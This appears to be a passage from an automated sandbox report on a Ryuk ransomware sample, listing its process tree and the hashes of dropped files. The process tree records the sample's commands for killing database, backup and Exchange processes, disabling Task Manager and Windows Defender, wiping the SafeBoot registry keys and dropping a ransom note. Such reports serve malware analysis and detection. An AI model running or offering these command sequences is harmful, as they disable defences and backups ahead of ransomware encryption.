C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵PID:4572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit2⤵
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Windows\system32\cmd.execmd.exe /c taskkill /t /f /im sql*3⤵
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\system32\taskkill.exetaskkill /t /f /im sql*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3336
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog12⤵PID:3728
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog22⤵PID:4160
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID2⤵PID:4996
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog12⤵PID:3688
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "2⤵PID:3788
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵PID:5060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:4984
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵PID:1100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵PID:3064
-
C:\Windows\system32\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F3⤵PID:5108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵PID:2792
-
C:\Windows\system32\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵PID:5068
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD582ea3d2f6fc005352ce69909570def3d
SHA1a43c1be5adc6a957d8a4ed727c3d1d5c648b6397
SHA25656edcf4ec31883a101939b9fb4149d4944f00be0663a4a339afbc0910ea085bc
SHA512197d2e2e5208de3c338ecc383b0fe016c8b5148d476640b6d1a7054f9417e698070edf38376359a26d43a7c6240d0362744f8fd416d46f723d492f230af1a440
-
Filesize
889KB
MD5ecd9d8ef99eb9813fa4eced549ea4d88
SHA17db7bff4ca9e94bbfe026c2282f3ce36e423f183
SHA256fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
SHA5122882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b
-
Filesize
8B
MD54a612255a55cb05d467ccb54b9ff56b0
SHA125036eb0954767a16b8997d467ea25e2482c3968
SHA256c4d8b3cd93a5a21c8354d1c3d1cd57d3b6575551c467ae1a726dd4eaccffceb7
SHA51268c9e718145c467dc814cec79d1a18237ce3c042d3591bb1444c5919bd537585962511eac21a18254b59740591776b0560847dbd0af4e19a81839b47ae8f35f6
-
Filesize
144B
MD52d581d7f41be876ce36523d0a7f2a64a
SHA1279f1b7f8936ab44e75bec3695d68569d8bbca9e
SHA25653c9308d8e9a7949f9348038493d87aa1218a148f404a7c340f7d47525ea90dd
SHA5124caf790b2d8feb5b2e9bab0ede191cff81a1547221408255e17e5e549a1fcd3615ea502d6d55b843c50a0eeac0bad13a2261d03f8b580ce6a592298340071c53
-
Filesize
1KB
MD582ea3d2f6fc005352ce69909570def3d
SHA1a43c1be5adc6a957d8a4ed727c3d1d5c648b6397
SHA25656edcf4ec31883a101939b9fb4149d4944f00be0663a4a339afbc0910ea085bc
SHA512197d2e2e5208de3c338ecc383b0fe016c8b5148d476640b6d1a7054f9417e698070edf38376359a26d43a7c6240d0362744f8fd416d46f723d492f230af1a440
-
Filesize
8KB
MD5f0206254aa436f4b295939126dc43bc2
SHA174b2eee424de0da9fae87196a9eee619ee8cfc83
SHA2564598ecf84bd6d3187e87536d6dc572d706266babd9e70fc6f56b0030de6b5d66
SHA512035847703efab63fa27fdb166aa472a9a058cb2f5d31773b7456268eade0be53a2ee072f1f94ea8c6a7667fefc7acecaaf34faffe7362398577e3e3389a38321
-
Filesize
8KB
MD5f0206254aa436f4b295939126dc43bc2
SHA174b2eee424de0da9fae87196a9eee619ee8cfc83
SHA2564598ecf84bd6d3187e87536d6dc572d706266babd9e70fc6f56b0030de6b5d66
SHA512035847703efab63fa27fdb166aa472a9a058cb2f5d31773b7456268eade0be53a2ee072f1f94ea8c6a7667fefc7acecaaf34faffe7362398577e3e3389a38321
-
Filesize
8KB
MD5f0206254aa436f4b295939126dc43bc2
SHA174b2eee424de0da9fae87196a9eee619ee8cfc83
SHA2564598ecf84bd6d3187e87536d6dc572d706266babd9e70fc6f56b0030de6b5d66
SHA512035847703efab63fa27fdb166aa472a9a058cb2f5d31773b7456268eade0be53a2ee072f1f94ea8c6a7667fefc7acecaaf34faffe7362398577e3e3389a38321
-
Filesize
292B
MD55435f8aa7f1033e7d46508270d00df70
SHA11b365e129fba3e7978fb12182d7dfdae1e8597a7
SHA256838e614788a908ebb3bb8edfc5653ef4c3a5771e8e91c421f1e66e9d92cccdb3
SHA512bf078fe60f2cd8430092e87a3490ff9ac7f52b99af9b06fb0c7415b540a281eab4204a160638aedbf4e430dec1e014e1b3208d6863f89ee575f946064a306c30
-
Filesize
292B
MD55435f8aa7f1033e7d46508270d00df70
SHA11b365e129fba3e7978fb12182d7dfdae1e8597a7
SHA256838e614788a908ebb3bb8edfc5653ef4c3a5771e8e91c421f1e66e9d92cccdb3
SHA512bf078fe60f2cd8430092e87a3490ff9ac7f52b99af9b06fb0c7415b540a281eab4204a160638aedbf4e430dec1e014e1b3208d6863f89ee575f946064a306c30
-
Filesize
292B
MD55435f8aa7f1033e7d46508270d00df70
SHA11b365e129fba3e7978fb12182d7dfdae1e8597a7
SHA256838e614788a908ebb3bb8edfc5653ef4c3a5771e8e91c421f1e66e9d92cccdb3
SHA512bf078fe60f2cd8430092e87a3490ff9ac7f52b99af9b06fb0c7415b540a281eab4204a160638aedbf4e430dec1e014e1b3208d6863f89ee575f946064a306c30
-
Filesize
889KB
MD5ecd9d8ef99eb9813fa4eced549ea4d88
SHA17db7bff4ca9e94bbfe026c2282f3ce36e423f183
SHA256fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
SHA5122882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b
-
Filesize
8B
MD54a612255a55cb05d467ccb54b9ff56b0
SHA125036eb0954767a16b8997d467ea25e2482c3968
SHA256c4d8b3cd93a5a21c8354d1c3d1cd57d3b6575551c467ae1a726dd4eaccffceb7
SHA51268c9e718145c467dc814cec79d1a18237ce3c042d3591bb1444c5919bd537585962511eac21a18254b59740591776b0560847dbd0af4e19a81839b47ae8f35f6
-
Filesize
8KB
MD5f0206254aa436f4b295939126dc43bc2
SHA174b2eee424de0da9fae87196a9eee619ee8cfc83
SHA2564598ecf84bd6d3187e87536d6dc572d706266babd9e70fc6f56b0030de6b5d66
SHA512035847703efab63fa27fdb166aa472a9a058cb2f5d31773b7456268eade0be53a2ee072f1f94ea8c6a7667fefc7acecaaf34faffe7362398577e3e3389a38321
-
Filesize
292B
MD55435f8aa7f1033e7d46508270d00df70
SHA11b365e129fba3e7978fb12182d7dfdae1e8597a7
SHA256838e614788a908ebb3bb8edfc5653ef4c3a5771e8e91c421f1e66e9d92cccdb3
SHA512bf078fe60f2cd8430092e87a3490ff9ac7f52b99af9b06fb0c7415b540a281eab4204a160638aedbf4e430dec1e014e1b3208d6863f89ee575f946064a306c30
-
Filesize
889KB
MD5ecd9d8ef99eb9813fa4eced549ea4d88
SHA17db7bff4ca9e94bbfe026c2282f3ce36e423f183
SHA256fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
SHA5122882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b